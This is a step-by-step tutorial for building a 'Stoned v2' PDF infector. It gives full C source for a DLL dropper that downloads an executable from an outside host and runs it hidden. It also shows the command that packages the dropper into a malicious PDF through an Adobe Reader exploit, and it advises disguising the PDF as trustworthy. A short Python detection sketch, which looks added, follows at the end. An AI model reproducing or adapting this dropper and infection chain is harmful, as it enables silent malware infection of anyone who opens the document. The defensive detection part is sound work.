Building a Stoned v2 PDF Infector and Dropper

The PDF infector infects the computer with Stoned when the PDF file is merely viewed; the dropper first downloads the latest version of Stoned from the internet.

1. We use the new PDF exploit available from http://milw0rm.org/exploits/9579; download the package. It works for Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 and Windows XP. You need Python 2 and Visual C++ installed (both freely available).

2. Open the "Visual Studio 2008-Eingabeaufforderung" (Visual Studio command line prompt). The following code is the dropper that downloads the infector from the internet and executes it. Save it as Stoned.c and run "cl /LD Stoned.c":

    #include "windows.h"
    #pragma comment(lib, "urlmon")
    #pragma comment(lib, "shell32")

    void StonedDropper()
    {
        // download & execute Stoned
        URLDownloadToFileA(NULL, "http://www.stoned-vienna.com/downloads/PDF Spread/Stoned v2.exe", "Stoned v2.exe", 0, NULL);
        ShellExecute(NULL, "open", "Stoned v2.exe", NULL, NULL, SW_HIDE);

        // lets open the "infected pdf notice"
        URLDownloadToFileA(NULL, "http://www.stoned-vienna.com/downloads/PDF Spread/You got infected.pdf", "You got infected.pdf", 0, NULL);
        ShellExecute(NULL, "open", "You got infected.pdf", NULL, NULL, SW_SHOW);

        ExitProcess(0);
    }

    BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason, LPVOID lpReserved)
    {
        int r;
        if (ul_reason == DLL_PROCESS_ATTACH)
            CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)StonedDropper, NULL, 0, &r);

        return TRUE;
    }

Unfortunately, this specific PDF exploit does not allow big files as payload, so the infector cannot be embedded directly into the PDF (only the small dropper). However, for other exploits, you can use the DLL version of the infector, http://www.stoned-vienna.com/downloads/PDF Spread/Stoned.dll (a LoadLibrary will do it).

3. Create the malicious PDF; in the package, execute:

    evil_pdf.py Stoned.pdf Stoned.dll

You should also consider changing the displayed text of the PDF to something trustworthy; use CAD-KAS PDF Editor to edit the Stoned.pdf.

4. Everyone who opens Stoned.pdf gets stoned!
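From the defender's side, the dropper above runs inside the PDF reader process, so the reader itself writes an executable to disk and then launches it. The following detection sketch is an added example, not part of the original page; the event field names, PIDs, directory paths and sample records are constructed for illustration and do not follow any particular logging product's schema.

```python
import ntpath

READERS = {"acrord32.exe", "acrobat.exe"}      # PDF viewer images to watch
EXEC_EXT = {".exe", ".dll", ".scr", ".com"}    # file types a viewer should not write

RDR = r"C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe"
TMP = "C:\\Documents and Settings\\user\\Desktop\\"   # constructed working directory

# Constructed sample events; the two file names are the ones the page's dropper uses.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 412, "image": RDR,
     "parent_pid": 300, "parent_image": r"C:\WINDOWS\explorer.exe"},
    {"type": "file_create", "pid": 412, "image": RDR, "target": TMP + "Stoned v2.exe"},
    {"type": "process_create", "pid": 977, "image": TMP + "Stoned v2.exe",
     "parent_pid": 412, "parent_image": RDR},
    {"type": "file_create", "pid": 412, "image": RDR, "target": TMP + "You got infected.pdf"},
    {"type": "process_create", "pid": 980, "image": RDR,
     "parent_pid": 412, "parent_image": RDR},
]

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def detect(events):
    """Return (severity, message) findings in event order."""
    dropped = {}       # reader pid -> set of lower-cased executable paths it wrote
    findings = []
    for ev in events:
        if ev["type"] == "file_create" and base(ev["image"]) in READERS:
            target = ev["target"].lower()
            if ntpath.splitext(target)[1] in EXEC_EXT:
                dropped.setdefault(ev["pid"], set()).add(target)
                findings.append(("medium",
                                 f"reader pid {ev['pid']} wrote executable {ev['target']}"))
        elif ev["type"] == "process_create" and base(ev["parent_image"]) in READERS:
            child = ev["image"].lower()
            if child in dropped.get(ev["parent_pid"], ()):
                # Write-then-run by the same reader process: the dropper pattern.
                findings.append(("high",
                                 f"reader pid {ev['parent_pid']} ran a file it dropped: {ev['image']}"))
            elif base(child) not in READERS:
                findings.append(("medium",
                                 f"reader pid {ev['parent_pid']} spawned {ev['image']}"))
    return findings

if __name__ == "__main__":
    for severity, message in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {message}")
```

The reader reopening a PDF through its own image is not flagged, which keeps the second ShellExecute in the dropper from producing noise while the write-then-run pair still raises the high-severity finding.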